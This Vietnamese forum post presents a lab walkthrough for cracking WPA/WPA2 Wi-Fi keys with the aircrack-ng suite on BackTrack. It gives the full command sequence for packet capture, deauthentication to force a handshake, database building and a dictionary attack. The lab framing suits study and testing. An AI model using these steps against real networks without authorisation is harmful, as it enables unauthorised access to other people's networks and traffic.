Quản trị net diễn đàn chia sẻ thông tin các thủ thuật mạng, internet bảo mật thông tin dành cho giới IT VIệt hy vọng là nơi bổ ích cho cộng đồng

Quản trị net diễn đàn chia sẻ thông tin các thủ thuật mạng, internet bảo mật thông tin dành cho giới IT VIệt hy vọng là nơi bổ ích cho cộng đồng (http://quantrinet.com/forum/index.php)
-   Wireless Security (Bảo mật mạng không dây) (http://quantrinet.com/forum/forumdisplay.php?f=428)
-   -   Cr_ac*k KHÓA WPA TRONG MẠNG WLAN (Tham khao) (http://quantrinet.com/forum/showthread.php?t=3468)

hoctinhoc 10-09-2009 06:17 AM

Cr_ac*k KHÓA WPA TRONG MẠNG WLAN (Tham khao)
 
Cr_ac*k KHÓA WPA TRONG MẠNG WLAN

THIẾT BỊ :

vMột AP làm AP target
vMột PC có card wireless làm client target.
vMột PC có card wireless làm attacker
vMột đĩa CD backtrack 3.0

YÊU CẦU:
vĐể cr_ac*k được wpa thì yêu cầu phải có môi trường cơ sở dữ liệu SQLite. Ta có thể download SQLite tại http://www.sqlite.org/sqlite-3.5.7.tar.gz .
vMột list chứa các password, list này phải đảm bảo có chứa khoá của mạng mà ta cần hack
vMột list chứa các ssid, list này phải đảm bảo có chứa ssid của AP target.
Bài lab này sẽ tiến hành Crac_k các loại khoá là WPA PERSONAL TKIP, WPA PERSONAL AES, WPA2 AES và WPA2 TKIP+AES.

CÁC BƯỚC TIẾN HÀNH Crac_k:
vCÀI ĐẶT SQLite như sau:
tar xvzf /root/Desktop/sqlite/sqlite-3.5.7.tar.gz
cd sqlite-3.5.7
./configure --prefix=/usr/local
Make

Crac_k WPA TKIP

·Chuyển card wireless về monitor mode như hình sau:


Dò tìm kênh và MAC address của AP target và client target bằng lệnh airodump-ng ath0 , kết quả dò tìm như hình sau:
http://img128.imageshack.us/img128/2504/h2yl8.jpg


Tiến hành bắt gói trên kênh và MAC address của AP target vừa tìm được bằng lệnh:
airodump-ng –c 1 –w/root/desktop/capture/wpa –bssid 00bf:05: d6:0c ath0



Tiếp theo, ta dùng tool aireplay và MAC address của client target để tạo ra 4 bước bắt tay với AP target :
Aireplay-ng -0 1 –a 00bf:05: d6:0c –c 00b6:99 78 ath0

http://img184.imageshack.us/img184/799/h4uv8.jpg



Quay lại màn hình bắt gói airodump quan sát ta thấy quá trình bắt tay đã diễn ra như hình sau:

http://img142.imageshack.us/img142/3246/h5fs7.jpg


Thế là ta đã capture được 4 bước bắt tay với AP target.
• Dùng tool airolib-ng để tạo cơ sở dữ liệu cho quá trình ***** bằng lệnh airolib-ng vnpro_gtvt_hcm init
với vnpro_gtvt_hcm là tên của cơ sở dữ liệu được chứa mặc định trong home folder.
Sau đó, ta import các list password và list ssid vào cơ sỡ dữ liệu vnpro_gtvt_hcm như sau:
Airolib-ng vnpro_gtvt_hcm import ascii essid dictionary.txt
/* với dictionary.txt là list chứa tên các ssid */

http://img263.imageshack.us/img263/3719/h6cy7.jpg

Airolib-ng vnpro_gtvt_hcm import ascii passwd password.lst
/* với password.lst là file chứa các password */

http://img517.imageshack.us/img517/1525/h7pt0.jpg


Ta kết hợp các ssid với password với nhau sau khi import thành công list password và list ssid bằng lệnh:
Airolib-ng vnpro_gtvt_hcm batch
kiểm tra lại số ssid và password hợp lệ mà ta có bằng lệnh sau:
Airolib-ng vnpro_gtvt_hcm stats

http://img257.imageshack.us/img257/8673/h8hy0.jpg


mở một shell mới chạy tool aircrack-ng để tìm khoá :
aircrack-ng –r vnpro_gtvt_hcm /root/desktop/capture/wpa*.cap

http://img505.imageshack.us/img505/6818/h9qy6.jpg


Sau khi lệnh thực hiện xong, ta thu được key


http://img243.imageshack.us/img243/6555/h10xu3.jpg


Quá trình crac*k khoá WPA AES, WPA2 AES và WPA2 TKIP+AES bao gồm các bước thực hiện hoàn toàn như việc crac*k WPA TKIP.

Chúc các bạn thành công
!

Theo: Ispace

:battay:


Bây giờ là 01:34 PM. Giờ GMT +7

Diễn đàn tin học QuantriNet
quantrinet.com | quantrimang.co.cc
Founded by Trương Văn Phương | Developed by QuantriNet's members.
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.